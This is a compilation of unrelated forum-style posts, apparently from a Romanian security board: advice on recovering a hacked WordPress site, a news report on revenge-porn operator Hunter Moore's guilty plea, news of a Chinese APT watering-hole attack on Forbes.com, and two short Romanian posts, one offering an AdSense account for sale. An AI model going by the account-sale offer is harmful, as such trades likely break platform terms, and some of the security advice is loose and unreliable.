that your site has crashed, you should look no further. Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you. Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down. As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort. How to Repair Your Hacked WordPress Site From the very moment when you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let’s have a look at what it takes for you to accomplish that: Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version. Scan and Cleanup Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan the machine of yours in detail and fix any problems that emerge. Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without even saying that you need to change the WP administrator password and get a new one (rather than the default that many users don’t mind keeping). Back up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever. Check wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them. Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son’s talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required. Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to. Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected. Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively. How to Protect Your Site from Any Future Attack As hacking is not a one-time deal, you will have to comply with some security precautions that help you maintain everything perfectly secured on your WordPress site. Below, there are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent: Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur. Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed. Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH for ensuring that it is infinitely more difficult for somebody to track you down. Use 2-Verification: Make sure that you enhance your site’s security using 2-step verification. This will result in the hacker requiring much bigger effort towards accessing your site. Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you out eliminate threats in the future. From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job – however, it is not impossible to complete and what you gain is truly remarkable; a fully protected WordPress site that does not compromise anything in terms of security and performance! Source

On Wednesday, Hunter Moore, 28, the notorious founder and operator of revenge porn site IsAnyoneUp.com, pleaded guilty [PDF] to unauthorized access to a computer, aiding and abetting unauthorized access of a computer, and identity theft. The charges each carry a maximum penalty of two to five years in jail, though Moore will not be sentenced until a later date. Moore’s IsAnybodyUp.com became hugely popular for posting nude and sexually explicit photos of people without their permission, and it spawned copycat revenge porn sites like Craig Brittain's IsAnybodyDown.com and Kevin Bollaert’s ugotposted.com. (Brittain was banned from posting any more nude photos of people without their explicit permission in a settlement with the Federal Trade Commission in January, while Bollaert was found guilty earlier this month of identity theft and extortion.) Moore’s site at one point allegedly received over 30 million page views and was bringing in about $10,000 in ad revenue per month. Some of the photos on Moore’s site came from disgruntled lovers handing over their ex’s nude pics (hence the name “revenge porn”), but Moore also pleaded guilty to paying conspirator Charles “Gary” Evens to steal nude photos from victims, often paying Evens up to $200 per week. "To help populate the site with nude photos, defendant aided, abetted, and procured, and willfully caused co-defendant Charles Evens ('Evens') to intentionally access, without authorization, a computer used in interstate commerce belonging to Google by accessing the victims’ e-mail accounts,” Moore’s plea agreement states. As Ars reported when Moore was arrested in January 2014, Evens compromised hundreds of e-mail accounts through social engineering. "It was not exploiting, to our knowledge, any vulnerabilities in any of these online accounts,” Assistant US Attorney Wendy Wu told Ars last year. "Basically, he was impersonating these victims' friends and was able to get confidential information that would allow him to access their accounts.” At one point, Rolling Stone deemed Moore the "Most Hated Man on the Internet," writing, "What was really inspired about [isAnybodyUp.com] was that alongside the photos, Moore included the ex's full name, profession, social-media profile and city of residence, which ensured that the pictures would pop up on Google, which further ensured that, in short order, the ex's mom and boss and everyone else would be seeing him or her online, sans skivvies." Besides a prison term and years of supervised parole, Moore’s plea agreement specifies that the government may delete all the data on Moore’s seized digital devices. "Moore is currently scheduled to be in court on Wednesday, February 25," a press officer for the Central California US Attorney's Office wrote to Ars. "But there is a strong possibility that his next court appearance will be delayed until March." In the UK and California, authorities have been trying to crack down on revenge porn with legislation. Earlier this month, England and Wales passed a law making it a criminal act to distribute nude and explicit photos of a person without their permission, and in California a similar year-old law was used in December to convict a man who posted photos of his ex-girlfriend on Facebook. Source

Salut baieti. Imi cer scuze daca nu am postat unde trebuie. Am avut mai multe site uri pe care am folosit un cont Adsense. Ca vechime, el are in jur de patru ani iar ultima plata de la google a fost anul trecut, in aprilie. Acum am renuntat la site uri si momentan in cont sunt in jur de 35 de euro. Pe cei interesati ii rog sa mi faca o oferta prin PM. Multumesc.

Salutare, pentru imbunatatirea bazei de cunostinte lucrez gratuit pentru cei ce au nevoie de un site de prezentare, modificari sau imbunatatiri unui site deja existent. Cei nevoiasi, mesaj privat.

A Chinese APT group was able to chain together two zero day vulnerabilities, one against Adobe’s Flash Player and one against Microsoft’s Internet Explorer 9, to compromise a popular news site late last year. The group’s aim was to gain access to computers at several U.S. defense and financial firms by setting up a watering hole attack on the site that would go on to drop a malicious .DLL. Researchers with Invincea and iSIGHT Partners worked in tandem to dig up information about the group, which was able to compromise a part of Forbes.com’s website that appears to users before they’re ported over to articles they’ve clicked on. That portion of the site, Forbes.com’s Thought of the Day, is powered by a Flash widget. According to researchers with Invincea the group was able to use a zero day vulnerability to hijack that widget for a short period, from Nov. 28 to Dec. 1. Over the course of those four days, the group targeted visitors to the site who worked at a handful of unnamed U.S. defense and financial firms. Researchers with iSIGHT discovered that in addition to the Flash flaw, the attackers also exploited an Internet Explorer vulnerability, a zero day that helped attackers bypass Address Space Layout Randomization (ASLR) in IE 9. While the Adobe bug, a buffer overflow (CVE-2014-9163) was patched back on Dec. 9, the ASLR mitigation bypass (CVE-2015-0071) was one of many patched yesterday in Microsoft’s monthly Patch Tuesday round of patches, an update that was especially heavy on Internet Explorer fixes. In a technical writeup of the attack yesterday, Invincea explained how Forbes’ site was able to redirect to an IP address, load the Flash exploit, and drop a DLL, hrn.dll, to be loaded into the machine’s memory. “Once in memory, the exploit gains administrative privileges and opens a command prompt,” Invincea’s executive summary reads, “Next the victim system was scanned to report on its current patch levels, network mapping, and complete IP configuration, including any VPN connections.” Both firms agreed to set their disclosures for yesterday to coincide with Microsoft’s patching of the Internet Explorer bug. While Chinese APT groups have been in the news lately – some reports have already pinned last week’s Anthem breach on shadowy hackers from the PRC – several firms are already familiar with the APT group behind this campaign. FireEye, first published research on the group back in 2013, referring to the collective as the Sunshop Group. Researchers there caught the group carrying out a campaign that hit a series of victims – a science and technology journal, a website for evangelical students, etc. – by exploiting an IE zero day and several Java bugs in May of that year. Throughout its research, dating back to 2010, iSIGHT has taken to calling the group Codoso Team. This attack, like others its linked back to them, used similar malware (Derusbi) and called on a command and control (C+C) domain its been seen using in the past as well. Regardless of what it goes by, the group has been seen targeting U.S. government entities, the military/defense sector, and financial services groups for at least five years running. FireEye found the same group was also responsible for hacking the Nobel Peace Prize Committee website in 2010. That attack also used a watering hole and made use of a browser (Firefox) zero day. While neither iSIGHT or Invincea could give concrete numbers regarding the number of victims Codoso was able to compromise with this campaign, both were firm in their stance that the attacks were highly targeted in nature and only visitors who worked at the defense and financial firms were infected. Sursa